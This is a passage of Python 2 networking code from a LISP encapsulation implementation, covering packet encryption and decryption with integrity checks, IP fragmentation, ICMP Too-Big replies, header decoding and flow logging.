frag, self.outer_ttl, 17, 0)
outer += self.outer_source.pack_address()
outer += self.outer_dest.pack_address()
outer = lisp_ip_checksum(outer)
elif (self.outer_version == 6):
outer = ""
# short = 6 << 12
# short |= self.outer_tos << 4
# short = socket.htons(short)
# tl = socket.htons(self.udp_length)
# outer = struct.pack("HHHBB", short, 0, tl, 17, self.outer_ttl)
# outer += self.outer_source.pack_address()
# outer += self.outer_dest.pack_address()
else:
return(None)
#endif
self.packet = outer + udp + lisp + self.packet
return(self)
#enddef
def cipher_pad(self, packet):
length = len(packet)
if ((length % 16) != 0):
pad = ((length/16) + 1) * 16
packet = packet.ljust(pad)
#endif
return(packet)
#enddef
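#
# For example (illustrative), a 70-byte plaintext is padded with spaces to
# 80 bytes (the next multiple of 16), while a 64-byte plaintext is returned
# unchanged.
#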
def encrypt(self, key, addr_str):
if (key == None or key.shared_key == None):
return([self.packet, False])
#endif
#
# Pad packet to multiple of 16 bytes and call AES cipher.
#
packet = self.cipher_pad(self.packet)
iv = key.get_iv()
ts = lisp_get_timestamp()
aead = None
if (key.cipher_suite == LISP_CS_25519_CHACHA):
encrypt = chacha.ChaCha(key.encrypt_key, iv).encrypt
elif (key.cipher_suite == LISP_CS_25519_GCM):
k = binascii.unhexlify(key.encrypt_key)
try:
aesgcm = AES.new(k, AES.MODE_GCM, iv)
encrypt = aesgcm.encrypt
aead = aesgcm.digest
except:
lprint("You need AES-GCM, do a 'pip install pycryptodome'")
return([self.packet, False])
#endtry
else:
k = binascii.unhexlify(key.encrypt_key)
encrypt = AES.new(k, AES.MODE_CBC, iv).encrypt
#endif
ciphertext = encrypt(packet)
if (ciphertext == None): return([self.packet, False])
ts = int(str(time.time() - ts).split(".")[1][0:6])
#
# GCM requires 16 bytes of an AEAD MAC tag at the end of the
# ciphertext. Needed to interoperate with the Go implementation of
# AES-GCM. The MAC digest was computed above.
#
if (aead != None): ciphertext += aead()
#
# Compute ICV and append to packet. ICV covers the LISP header, the
# IV, and the ciphertext.
#
self.lisp_header.key_id(key.key_id)
lisp = self.lisp_header.encode()
icv = key.do_icv(lisp + iv + ciphertext, iv)
ps = 4 if (key.do_poly) else 8
string = bold("Encrypt", False)
cipher_str = bold(key.cipher_suite_string, False)
addr_str = "RLOC: " + red(addr_str, False)
auth = "poly" if key.do_poly else "sha256"
auth = bold(auth, False)
icv_str = "ICV({}): 0x{}...{}".format(auth, icv[0:ps], icv[-ps::])
dprint("{} for key-id: {}, {}, {}, {}-time: {} usec".format( \
string, key.key_id, addr_str, icv_str, cipher_str, ts))
icv = int(icv, 16)
if (key.do_poly):
icv1 = byte_swap_64((icv >> 64) & LISP_8_64_MASK)
icv2 = byte_swap_64(icv & LISP_8_64_MASK)
icv = struct.pack("QQ", icv1, icv2)
else:
icv1 = byte_swap_64((icv >> 96) & LISP_8_64_MASK)
icv2 = byte_swap_64((icv >> 32) & LISP_8_64_MASK)
icv3 = socket.htonl(icv & 0xffffffff)
icv = struct.pack("QQI", icv1, icv2, icv3)
#endif
return([iv + ciphertext + icv, True])
#enddef
def decrypt(self, packet, header_length, key, addr_str):
#
# Do ICV first. If it succeeds, then decrypt. Get ICV from packet and
# truncate packet to run hash over. Compare packet hash with computed
# hash.
#
if (key.do_poly):
icv1, icv2 = struct.unpack("QQ", packet[-16::])
packet_icv = byte_swap_64(icv1) << 64
packet_icv |= byte_swap_64(icv2)
packet_icv = lisp_hex_string(packet_icv).zfill(32)
packet = packet[0:-16]
ps = 4
hash_str = bold("poly", False)
else:
icv1, icv2, icv3 = struct.unpack("QQI", packet[-20::])
packet_icv = byte_swap_64(icv1) << 96
packet_icv |= byte_swap_64(icv2) << 32
packet_icv |= socket.htonl(icv3)
packet_icv = lisp_hex_string(packet_icv).zfill(40)
packet = packet[0:-20]
ps = 8
hash_str = bold("sha", False)
#endif
lisp = self.lisp_header.encode()
#
# Get the IV and use it to decrypt and authenticate.
#
if (key.cipher_suite == LISP_CS_25519_CHACHA):
iv_len = 8
cipher_str = bold("chacha", False)
elif (key.cipher_suite == LISP_CS_25519_GCM):
iv_len = 12
cipher_str = bold("aes-gcm", False)
else:
iv_len = 16
cipher_str = bold("aes-cbc", False)
#endif
iv = packet[0:iv_len]
#
# Compute ICV over LISP header and packet payload.
#
computed_icv = key.do_icv(lisp + packet, iv)
p_icv = "0x{}...{}".format(packet_icv[0:ps], packet_icv[-ps::])
c_icv = "0x{}...{}".format(computed_icv[0:ps], computed_icv[-ps::])
if (computed_icv != packet_icv):
self.packet_error = "ICV-error"
funcs = cipher_str + "/" + hash_str
fail = bold("ICV failed ({})".format(funcs), False)
icv_str = "packet-ICV {} != computed-ICV {}".format(p_icv, c_icv)
dprint(("{} from RLOC {}, receive-port: {}, key-id: {}, " + \
"packet dropped, {}").format(fail, red(addr_str, False),
self.udp_sport, key.key_id, icv_str))
dprint("{}".format(key.print_keys()))
#
# This is the 4-tuple NAT case. There is another addr:port that
# should have the crypto-key the encapsulator is using. This is
# typically done on the RTR.
#
lisp_retry_decap_keys(addr_str, lisp + packet, iv, packet_icv)
return([None, False])
#endif
#
# Advance over IV for decryption.
#
packet = packet[iv_len::]
#
# Call AES or chacha cipher. For AES-CBC, make sure the ciphertext is a
# multiple of 16 bytes before decrypting.
#
ts = lisp_get_timestamp()
if (key.cipher_suite == LISP_CS_25519_CHACHA):
decrypt = chacha.ChaCha(key.encrypt_key, iv).decrypt
elif (key.cipher_suite == LISP_CS_25519_GCM):
k = binascii.unhexlify(key.encrypt_key)
try:
decrypt = AES.new(k, AES.MODE_GCM, iv).decrypt
except:
self.packet_error = "no-decrypt-key"
lprint("You need AES-GCM, do a 'pip install pycryptodome'")
return([None, False])
#endtry
else:
if ((len(packet) % 16) != 0):
dprint("Ciphertext not multiple of 16 bytes, packet dropped")
return([None, False])
#endif
k = binascii.unhexlify(key.encrypt_key)
decrypt = AES.new(k, AES.MODE_CBC, iv).decrypt
#endif
plaintext = decrypt(packet)
ts = int(str(time.time() - ts).split(".")[1][0:6])
#
# Now decrypt packet and return plaintext payload.
#
string = bold("Decrypt", False)
addr_str = "RLOC: " + red(addr_str, False)
auth = "poly" if key.do_poly else "sha256"
auth = bold(auth, False)
icv_str = "ICV({}): {}".format(auth, p_icv)
dprint("{} for key-id: {}, {}, {} (good), {}-time: {} usec". \
format(string, key.key_id, addr_str, icv_str, cipher_str, ts))
#
# Keep only the outer header, UDP header, and LISP header in self.packet.
# We will append the plaintext in the caller once we parse the inner
# packet length so we can truncate any padding the encryptor put on.
#
self.packet = self.packet[0:header_length]
return([plaintext, True])
#enddef
def fragment_outer(self, outer_hdr, inner_packet):
frag_len = 1000
#
# Break up packet payload in fragments and put in array to have
# IP header added in next loop below.
#
frags = []
offset = 0
length = len(inner_packet)
while (offset < length):
frag = inner_packet[offset::]
if (len(frag) > frag_len): frag = frag[0:frag_len]
frags.append(frag)
offset += len(frag)
#endwhile
#
# Now fix the outer IPv4 header with fragment-offset and total-length
# values, recompute the header checksum, and prepend it to each fragment.
#
fragments = []
offset = 0
for frag in frags:
#
# Set frag-offset field in outer IPv4 header.
#
fo = offset if (frag == frags[-1]) else 0x2000 + offset
fo = socket.htons(fo)
outer_hdr = outer_hdr[0:6] + struct.pack("H", fo) + outer_hdr[8::]
#
# Set total-length field in outer IPv4 header and checksum.
#
l = socket.htons(len(frag) + 20)
outer_hdr = outer_hdr[0:2] + struct.pack("H", l) + outer_hdr[4::]
outer_hdr = lisp_ip_checksum(outer_hdr)
fragments.append(outer_hdr + frag)
offset += len(frag) / 8
#endfor
return(fragments)
#enddef
def send_icmp_too_big(self, inner_packet):
global lisp_last_icmp_too_big_sent
global lisp_icmp_raw_socket
elapsed = time.time() - lisp_last_icmp_too_big_sent
if (elapsed < LISP_ICMP_TOO_BIG_RATE_LIMIT):
lprint("Rate limit sending ICMP Too-Big to {}".format( \
self.inner_source.print_address_no_iid()))
return(False)
#endif
#
# Destination Unreachable Message - Too Big Message
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 3 | Code = 4 | Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | unused | MTU = 1400 |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Internet Header + 64 bits of Original Data Datagram |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
mtu = socket.htons(1400)
icmp = struct.pack("BBHHH", 3, 4, 0, 0, mtu)
icmp += inner_packet[0:20+8]
icmp = lisp_icmp_checksum(icmp)
#
# Build IP header. Make the source of the ICMP-invoking packet the
# destination and our address the source. We obtained our address when we
# thought we could encap, so lisp_packet.outer_source has the RLOC address
# of this system.
#
host = inner_packet[12:16]
dest = self.inner_source.print_address_no_iid()
me = self.outer_source.pack_address()
#
# IP_HDRINCL requires the total-length and frag-offset fields to be in
# host byte order. We need to build the total-length field just like
# lisp_packet.encode(), checksum, and then fix the outer header. So that
# logic is semantically replicated here. Same logic is in lisp_packet.
# fragment() as well.
#
tl = socket.htons(20+36)
ip = struct.pack("BBHHHBBH", 0x45, 0, tl, 0, 0, 32, 1, 0) + me + host
ip = lisp_ip_checksum(ip)
ip = self.fix_outer_header(ip)
ip += icmp
tb = bold("Too-Big", False)
lprint("Send ICMP {} to {}, mtu 1400: {}".format(tb, dest,
lisp_format_packet(ip)))
try:
lisp_icmp_raw_socket.sendto(ip, (dest, 0))
except socket.error, e:
lprint("lisp_icmp_raw_socket.sendto() failed: {}".format(e))
return(False)
#endtry
#
# Caller function sends packet on raw socket. Kernel routes out
# interface to destination.
#
lisp_last_icmp_too_big_sent = lisp_get_timestamp()
return(True)
#enddef
def fragment(self):
global lisp_icmp_raw_socket
global lisp_ignore_df_bit
packet = self.fix_outer_header(self.packet)
#
# If inner header is IPv4, we will fragment the inner header and encap
# each fragment. If the inner header is IPv6, we will not add the
# Fragmentation Header into the inner IPv6 packet.
#
length = len(packet)
if (length <= 1500): return([packet], "Fragment-None")
packet = self.packet
#
# Fragment outer IPv4 header if inner packet is IPv6 (or Mac frame).
# We cannot fragment IPv6 packet since we are not the source.
#
if (self.inner_version != 4):
ident = random.randint(0, 0xffff)
outer_hdr = packet[0:4] + struct.pack("H", ident) + packet[6:20]
inner_packet = packet[20::]
fragments = self.fragment_outer(outer_hdr, inner_packet)
return(fragments, "Fragment-Outer")
#endif
#
# Fragment inner IPv4 packet.
#
outer_hdr_len = 56 if (self.outer_version == 6) else 36
outer_hdr = packet[0:outer_hdr_len]
inner_hdr = packet[outer_hdr_len: outer_hdr_len + 20]
inner_packet = packet[outer_hdr_len + 20::]
#
# If DF-bit is set, don't fragment packet. Do MTU discovery if
# configured with env variable.
#
frag_field = struct.unpack("H", inner_hdr[6:8])[0]
frag_field = socket.ntohs(frag_field)
if (frag_field & 0x4000):
if (lisp_icmp_raw_socket != None):
inner = packet[outer_hdr_len::]
if (self.send_icmp_too_big(inner)): return([], None)
#endif
if (lisp_ignore_df_bit):
frag_field &= ~0x4000
else:
df_bit = bold("DF-bit set", False)
dprint("{} in inner header, packet discarded".format(df_bit))
return([], "Fragment-None-DF-bit")
#endif
#endif
offset = 0
length = len(inner_packet)
fragments = []
while (offset < length):
fragments.append(inner_packet[offset:offset+1400])
offset += 1400
#endwhile
#
# Now put inner header and outer header on each fragment.
#
frags = fragments
fragments = []
mf = True if frag_field & 0x2000 else False
frag_field = (frag_field & 0x1fff) * 8
for frag in frags:
#
# Set fragment-offset and MF bit if not last fragment.
#
ff = frag_field / 8
if (mf):
ff |= 0x2000
elif (frag != frags[-1]):
ff |= 0x2000
#endif
ff = socket.htons(ff)
inner_hdr = inner_hdr[0:6] + struct.pack("H", ff) + inner_hdr[8::]
#
# Set length of fragment, set up offset for next fragment-offset,
# and header checksum fragment packet. Then prepend inner header
# to payload.
#
length = len(frag)
frag_field += length
l = socket.htons(length + 20)
inner_hdr = inner_hdr[0:2] + struct.pack("H", l) + \
inner_hdr[4:10] + struct.pack("H", 0) + inner_hdr[12::]
inner_hdr = lisp_ip_checksum(inner_hdr)
fragment = inner_hdr + frag
#
# Change outer header length and header checksum if IPv4 outer
# header. If IPv6 outer header, raw sockets prepends the header.
#
length = len(fragment)
if (self.outer_version == 4):
l = length + outer_hdr_len
length += 16
outer_hdr = outer_hdr[0:2] + struct.pack("H", l) + \
outer_hdr[4::]
outer_hdr = lisp_ip_checksum(outer_hdr)
fragment = outer_hdr + fragment
fragment = self.fix_outer_header(fragment)
#endif
#
# Finally fix outer UDP header length. Byte-swap it.
#
udp_len_index = outer_hdr_len - 12
l = socket.htons(length)
fragment = fragment[0:udp_len_index] + struct.pack("H", l) + \
fragment[udp_len_index+2::]
fragments.append(fragment)
#endfor
return(fragments, "Fragment-Inner")
#enddef
def fix_outer_header(self, packet):
#
# IP_HDRINCL requires the total-length and frag-offset fields to be
# in host byte order. So they have to be byte-swapped here. But when testing
# we (UPC guys) discovered the frag field didn't need swapping. The
# conclusion is that byte-swapping is necessary for MacOS but not for
# Linux OSes.
#
if (self.outer_version == 4 or self.inner_version == 4):
if (lisp_is_macos()):
packet = packet[0:2] + packet[3] + packet[2] + packet[4:6] + \
packet[7] + packet[6] + packet[8::]
else:
packet = packet[0:2] + packet[3] + packet[2] + packet[4::]
#endif
#endif
return(packet)
#enddef
def send_packet(self, lisp_raw_socket, dest):
if (lisp_flow_logging and dest != self.inner_dest): self.log_flow(True)
dest = dest.print_address_no_iid()
fragments, in_or_out = self.fragment()
for fragment in fragments:
if (len(fragments) != 1):
self.packet = fragment
self.print_packet(in_or_out, True)
#endif
try: lisp_raw_socket.sendto(fragment, (dest, 0))
except socket.error, e:
lprint("socket.sendto() failed: {}".format(e))
#endtry
#endfor
#enddef
def send_l2_packet(self, l2_socket, mac_header):
if (l2_socket == None):
lprint("No layer-2 socket, drop IPv6 packet")
return
#endif
if (mac_header == None):
lprint("Could not build MAC header, drop IPv6 packet")
return
#endif
packet = mac_header + self.packet
# try: l2_socket.send(packet)
# except socket.error, e:
# lprint("send_l2_packet(): socket.send() failed: {}".format(e))
# #endtry
# return
#
# Use tuntap tunnel interface instead of raw sockets for IPv6
# decapsulated packets.
#
l2_socket.write(packet)
return
#enddef
def bridge_l2_packet(self, eid, db):
try: dyn_eid = db.dynamic_eids[eid.print_address_no_iid()]
except: return
try: interface = lisp_myinterfaces[dyn_eid.interface]
except: return
try:
socket = interface.get_bridge_socket()
if (socket == None): return
except: return
try: socket.send(self.packet)
except socket.error, e:
lprint("bridge_l2_packet(): socket.send() failed: {}".format(e))
#endtry
#enddef
def is_lisp_packet(self, packet):
udp = (struct.unpack("B", packet[9])[0] == LISP_UDP_PROTOCOL)
if (udp == False): return(False)
port = struct.unpack("H", packet[22:24])[0]
if (socket.ntohs(port) == LISP_DATA_PORT): return(True)
port = struct.unpack("H", packet[20:22])[0]
if (socket.ntohs(port) == LISP_DATA_PORT): return(True)
return(False)
#enddef
def decode(self, is_lisp_packet, lisp_ipc_socket, stats):
self.packet_error = ""
packet = self.packet
orig_len = len(packet)
L3 = L2 = True
#
# Get version number of outer header so we can decode outer addresses.
#
header_len = 0
iid = 0
if (is_lisp_packet):
iid = self.lisp_header.get_instance_id()
version = struct.unpack("B", packet[0:1])[0]
self.outer_version = version >> 4
if (self.outer_version == 4):
#
# MacOS is zeroing the IP header checksum for a raw socket.
# If we receive this, bypass the checksum calculation.
#
orig_checksum = struct.unpack("H", packet[10:12])[0]
packet = lisp_ip_checksum(packet)
checksum = struct.unpack("H", packet[10:12])[0]
if (checksum != 0):
if (orig_checksum != 0 or lisp_is_macos() == False):
self.packet_error = "checksum-error"
if (stats):
stats[self.packet_error].increment(orig_len)
#endif
lprint("IPv4 header checksum failed for outer header")
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#endif
afi = LISP_AFI_IPV4
offset = 12
self.outer_tos = struct.unpack("B", packet[1:2])[0]
self.outer_ttl = struct.unpack("B", packet[8:9])[0]
header_len = 20
elif (self.outer_version == 6):
afi = LISP_AFI_IPV6
offset = 8
tos = struct.unpack("H", packet[0:2])[0]
self.outer_tos = (socket.ntohs(tos) >> 4) & 0xff
self.outer_ttl = struct.unpack("B", packet[7:8])[0]
header_len = 40
else:
self.packet_error = "outer-header-error"
if (stats): stats[self.packet_error].increment(orig_len)
lprint("Cannot decode outer header")
return(None)
#endif
self.outer_source.afi = afi
self.outer_dest.afi = afi
addr_length = self.outer_source.addr_length()
self.outer_source.unpack_address(packet[offset:offset+addr_length])
offset += addr_length
self.outer_dest.unpack_address(packet[offset:offset+addr_length])
packet = packet[header_len::]
self.outer_source.mask_len = self.outer_source.host_mask_len()
self.outer_dest.mask_len = self.outer_dest.host_mask_len()
#
# Get UDP fields
#
short = struct.unpack("H", packet[0:2])[0]
self.udp_sport = socket.ntohs(short)
short = struct.unpack("H", packet[2:4])[0]
self.udp_dport = socket.ntohs(short)
short = struct.unpack("H", packet[4:6])[0]
self.udp_length = socket.ntohs(short)
short = struct.unpack("H", packet[6:8])[0]
self.udp_checksum = socket.ntohs(short)
packet = packet[8::]
#
# Determine what is inside, a packet or a frame.
#
L3 = (self.udp_dport == LISP_DATA_PORT or
self.udp_sport == LISP_DATA_PORT)
L2 = (self.udp_dport in (LISP_L2_DATA_PORT, LISP_VXLAN_DATA_PORT))
#
# Get LISP header fields.
#
if (self.lisp_header.decode(packet) == False):
self.packet_error = "lisp-header-error"
if (stats): stats[self.packet_error].increment(orig_len)
if (lisp_flow_logging): self.log_flow(False)
lprint("Cannot decode LISP header")
return(None)
#endif
packet = packet[8::]
iid = self.lisp_header.get_instance_id()
header_len += 16
#endif
if (iid == 0xffffff): iid = 0
#
# Time to decrypt if K-bits set.
#
decrypted = False
key_id = self.lisp_header.k_bits
if (key_id):
addr_str = lisp_get_crypto_decap_lookup_key(self.outer_source,
self.udp_sport)
if (addr_str == None):
self.packet_error = "no-decrypt-key"
if (stats): stats[self.packet_error].increment(orig_len)
self.print_packet("Receive", is_lisp_packet)
ks = bold("No key available", False)
dprint("{} for key-id {} to decrypt packet".format(ks, key_id))
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
key = lisp_crypto_keys_by_rloc_decap[addr_str][key_id]
if (key == None):
self.packet_error = "no-decrypt-key"
if (stats): stats[self.packet_error].increment(orig_len)
self.print_packet("Receive", is_lisp_packet)
ks = bold("No key available", False)
dprint("{} to decrypt packet from RLOC {}".format(ks,
red(addr_str, False)))
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#
# Decrypt and continue processing inner header.
#
key.use_count += 1
packet, decrypted = self.decrypt(packet, header_len, key,
addr_str)
if (decrypted == False):
if (stats): stats[self.packet_error].increment(orig_len)
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#endif
#
# Get inner header fields.
#
version = struct.unpack("B", packet[0:1])[0]
self.inner_version = version >> 4
if (L3 and self.inner_version == 4 and version >= 0x45):
packet_len = socket.ntohs(struct.unpack("H", packet[2:4])[0])
self.inner_tos = struct.unpack("B", packet[1:2])[0]
self.inner_ttl = struct.unpack("B", packet[8:9])[0]
self.inner_protocol = struct.unpack("B", packet[9:10])[0]
self.inner_source.afi = LISP_AFI_IPV4
self.inner_dest.afi = LISP_AFI_IPV4
self.inner_source.unpack_address(packet[12:16])
self.inner_dest.unpack_address(packet[16:20])
frag_field = socket.ntohs(struct.unpack("H", packet[6:8])[0])
self.inner_is_fragment = (frag_field & 0x2000 or frag_field != 0)
if (self.inner_protocol == LISP_UDP_PROTOCOL):
self.inner_sport = struct.unpack("H", packet[20:22])[0]
self.inner_sport = socket.ntohs(self.inner_sport)
self.inner_dport = struct.unpack("H", packet[22:24])[0]
self.inner_dport = socket.ntohs(self.inner_dport)
#endif
elif (L3 and self.inner_version == 6 and version >= 0x60):
packet_len = socket.ntohs(struct.unpack("H", packet[4:6])[0]) + 40
tos = struct.unpack("H", packet[0:2])[0]
self.inner_tos = (socket.ntohs(tos) >> 4) & 0xff
self.inner_ttl = struct.unpack("B", packet[7:8])[0]
self.inner_protocol = struct.unpack("B", packet[6:7])[0]
self.inner_source.afi = LISP_AFI_IPV6
self.inner_dest.afi = LISP_AFI_IPV6
self.inner_source.unpack_address(packet[8:24])
self.inner_dest.unpack_address(packet[24:40])
if (self.inner_protocol == LISP_UDP_PROTOCOL):
self.inner_sport = struct.unpack("H", packet[40:42])[0]
self.inner_sport = socket.ntohs(self.inner_sport)
self.inner_dport = struct.unpack("H", packet[42:44])[0]
self.inner_dport = socket.ntohs(self.inner_dport)
#endif
elif (L2):
packet_len = len(packet)
self.inner_tos = 0
self.inner_ttl = 0
self.inner_protocol = 0
self.inner_source.afi = LISP_AFI_MAC
self.inner_dest.afi = LISP_AFI_MAC
self.inner_dest.unpack_address(self.swap_mac(packet[0:6]))
self.inner_source.unpack_address(self.swap_mac(packet[6:12]))
elif (self.lisp_header.get_instance_id() == 0xffffff):
if (lisp_flow_logging): self.log_flow(False)
return(self)
else:
self.packet_error = "bad-inner-version"
if (stats): stats[self.packet_error].increment(orig_len)
lprint("Cannot decode encapsulation, header version {}".format(\
hex(version)))
packet = lisp_format_packet(packet[0:20])
lprint("Packet header: {}".format(packet))
if (lisp_flow_logging and is_lisp_packet): self.log_flow(False)
return(None)
#endif
self.inner_source.mask_len = self.inner_source.host_mask_len()
self.inner_dest.mask_len = self.inner_dest.host_mask_len()
self.inner_source.instance_id = iid
self.inner_dest.instance_id = iid
#
# If we are configured to do Nonce-Echoing, do lookup on source-EID
# to obtain source RLOC to store nonce to echo.
#
if (lisp_nonce_echoing and is_lisp_packet):
echo_nonce = lisp_get_echo_nonce(self.outer_source, None)
if (echo_nonce == None):
rloc_str = self.outer_source.print_address_no_iid()
echo_nonce = lisp_echo_nonce(rloc_str)
#endif
nonce = self.lisp_header.get_nonce()
if (self.lisp_header.is_e_bit_set()):
echo_nonce.receive_request(lisp_ipc_socket, nonce)
elif (echo_nonce.request_nonce_sent):
echo_nonce.receive_echo(lisp_ipc_socket, nonce)
#endif
#endif
#
# If we decrypted, we may have to truncate packet if the encrypter
# padded the packet.
#
if (decrypted): self.packet += packet[:packet_len]
#
# Log a packet that was parsed correctly.
#
if (lisp_flow_logging and is_lisp_packet): self.log_flow(False)
return(self)
#enddef
def swap_mac(self, mac):
return(mac[1] + mac[0] + mac[3] + mac[2] + mac[5] + mac[4])
#enddef
def strip_outer_headers(self):
offset = 16
offset += 20 if (self.outer_version == 4) else 40
self.packet = self.packet[offset::]
return(self)
#enddef
def hash_ports(self):
packet = self.packet
version = self.inner_version
hashval = 0
if (version == 4):
protocol = struct.unpack("B", packet[9])[0]
if (self.inner_is_fragment): return(protocol)
if (protocol in [6, 17]):
hashval = protocol
hashval += struct.unpack("I", packet[20:24])[0]
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
#endif
if (version == 6):
protocol = struct.unpack("B", packet[6])[0]
if (protocol in [6, 17]):
hashval = protocol
hashval += struct.unpack("I", packet[40:44])[0]
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
#endif
return(hashval)
#enddef
def hash_packet(self):
hashval = self.inner_source.address ^ self.inner_dest.address
hashval += self.hash_ports()
if (self.inner_version == 4):
hashval = (hashval >> 16) ^ (hashval & 0xffff)
elif (self.inner_version == 6):
hashval = (hashval >> 64) ^ (hashval & 0xffffffffffffffff)
hashval = (hashval >> 32) ^ (hashval & 0xffffffff)
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
self.udp_sport = 0xf000 | (hashval & 0xfff)
#enddef
def print_packet(self, s_or_r, is_lisp_packet):
if (is_lisp_packet == False):
iaddr_str = "{} -> {}".format(self.inner_source.print_address(),
self.inner_dest.print_address())
dprint(("{} {}, tos/ttl: {}/{}, length: {}, packet: {} ..."). \
format(bold(s_or_r, False),
green(iaddr_str, False), self.inner_tos,
self.inner_ttl, len(self.packet),
lisp_format_packet(self.packet[0:60])))
return
#endif
if (s_or_r.find("Receive") != -1):
ed = "decap"
ed += "-vxlan" if self.udp_dport == LISP_VXLAN_DATA_PORT else ""
else:
ed = s_or_r
if (ed in ["Send", "Replicate"] or ed.find("Fragment") != -1):
ed = "encap"
#endif
#endif
oaddr_str = "{} -> {}".format(self.outer_source.print_address_no_iid(),
self.outer_dest.print_address_no_iid())
#
# Special case where Info-Request is inside of a 4341 packet for
# NAT-traversal.
#
if (self.lisp_header.get_instance_id() == 0xffffff):
line = ("{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + \
"{}/{}, outer UDP: {} -> {}, ")
line += bold("control-packet", False) + ": {} ..."
dprint(line.format(bold(s_or_r, False), red(oaddr_str, False),
self.outer_tos, self.outer_ttl, self.udp_sport,
self.udp_dport, lisp_format_packet(self.packet[0:56])))
return
else:
line = ("{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + \
"{}/{}, outer UDP: {} -> {}, inner EIDs: {}, " + \
"inner tos/ttl: {}/{}, length: {}, {}, packet: {} ...")
#endif
if (self.lisp_header.k_bits):
if (ed == "encap"): ed = "encrypt/encap"
if (ed == "decap"): ed = "decap/decrypt"
#endif
iaddr_str = "{} -> {}".format(self.inner_source.print_address(),
self.inner_dest.print_address())
dprint(line.format(bold(s_or_r, False), red(oaddr_str, False),
self.outer_tos, self.outer_ttl, self.udp_sport, self.udp_dport,
green(iaddr_str, False), self.inner_tos, self.inner_ttl,
len(self.packet), self.lisp_header.print_header(ed),
lisp_format_packet(self.packet[0:56])))
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.inner_source, self.inner_dest))
#enddef
def get_raw_socket(self):
iid = str(self.lisp_header.get_instance_id())
if (iid == "0"): return(None)
if (lisp_iid_to_interface.has_key(iid) == False): return(None)
interface = lisp_iid_to_interface[iid]
s = interface.get_socket()
if (s == None):
string = bold("SO_BINDTODEVICE", False)
enforce = (os.getenv("LISP_ENFORCE_BINDTODEVICE") != None)
lprint("{} required for multi-tenancy support, {} packet".format( \
string, "drop" if enforce else "forward"))
if (enforce): return(None)
#endif
iid = bold(iid, False)
d = bold(interface.device, False)
dprint("Send packet on instance-id {} interface {}".format(iid, d))
return(s)
#enddef
def log_flow(self, encap):
global lisp_flow_log
dump = os.path.exists("./log-flows")
if (len(lisp_flow_log) == LISP_FLOW_LOG_SIZE or dump):
args = [lisp_flow_log]
lisp_flow_log = []
threading.Thread(target=lisp_write_flow_log, args=args).start()
if (dump): os.system("rm ./log-flows")
return
#endif
ts = datetime.datetime.now()
lisp_flow_log.append([ts, encap, self.packet, self])
#enddef
def print_flow(self, ts, encap, packet):
ts = ts.strftime("%m/%d/%y %H:%M:%S.%f")[:-3]
flow = "{}: {}".format(ts, "encap" if encap else "decap")
osrc = red(self.outer_source.print_address_no_iid(), False)
odst = red(self.outer_dest.print_address_no_iid(), False)
isrc = green(self.inner_source.print_address(), False)
idst = green(self.inner_dest.print_address(), False)
if (self.lisp_header.get_instance_id() == 0xffffff):
flow += " {}:{} -> {}:{}, LISP control message type {}\n"
flow = flow.format(osrc, self.udp_sport, odst, self.udp_dport,
self.inner_version)
return(flow)
#endif
if (self.outer_dest.is_null() == False):
flow += " {}:{} -> {}:{}, len/tos/ttl {}/{}/{}"
flow = flow.format(osrc, self.udp_sport, odst, self.udp_dport,
len(packet), self.outer_tos, self.outer_ttl)
#endif
#
# Can't look at inner header if encrypted. Protecting user privacy.
#
if (self.lisp_header.k_bits != 0):
error = "\n"
if (self.packet_error != ""):
error = " ({})".format(self.packet_error) + error
#endif
flow += ", encrypted" + error
return(flow)
#endif
#
# Position to inner header.
#
if (self.outer_dest.is_null() == False):
packet = packet[36::] if self.outer_version == 4 else packet[56::]
#endif
protocol = packet[9] if self.inner_version == 4 else packet[6]
protocol = struct.unpack("B", protocol)[0]
flow += " {} -> {}, len/tos/ttl/prot {}/{}/{}/{}"
flow = flow.format(isrc, idst, len(packet), self.inner_tos,
self.inner_ttl, protocol)
#
# Show some popular transport layer data.
#
if (protocol in [6, 17]):
ports = packet[20:24] if self.inner_version == 4 else packet[40:44]
if (len(ports) == 4):
ports = socket.ntohl(struct.unpack("I", ports)[0])
flow += ", ports {} -> {}".format(ports >> 16, ports & 0xffff)
#endif
elif (protocol == 1):
seq = packet[26:28] if self.inner_version == 4 else packet[46:48]
if (len(seq) == 2):
seq = socket.ntohs(struct.unpack("H", seq)[0])
flow += ", icmp-seq {}".format(seq)
#endif
#endif
if (self.packet_error != ""):
flow += " ({})".format(self.packet_error)
#endif
flow += "\n"
return(flow)
#enddef
def is_trace(self):
ports = [self.inner_sport, self.inner_dport]
return(self.inner_protocol == LISP_UDP_PROTOCOL and
LISP_TRACE_PORT in ports)
#enddef
#endclass
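#
# Example sketch, not called by the implementation: lisp_packet.hash_packet()
# above folds the inner flow hash into 12 bits and or's in 0xf000 so the
# encapsulation UDP source port always lands in the range 0xf000-0xffff.
# The helper below only illustrates that final fold for a 32-bit hash
# value; the function name is not part of the implementation.
#
def lisp_example_fold_udp_source_port(hashval):
    hashval = (hashval >> 16) ^ (hashval & 0xffff)
    return(0xf000 | (hashval & 0xfff))
#enddef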
#
# LISP encapsulation header definition.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = 4341 |
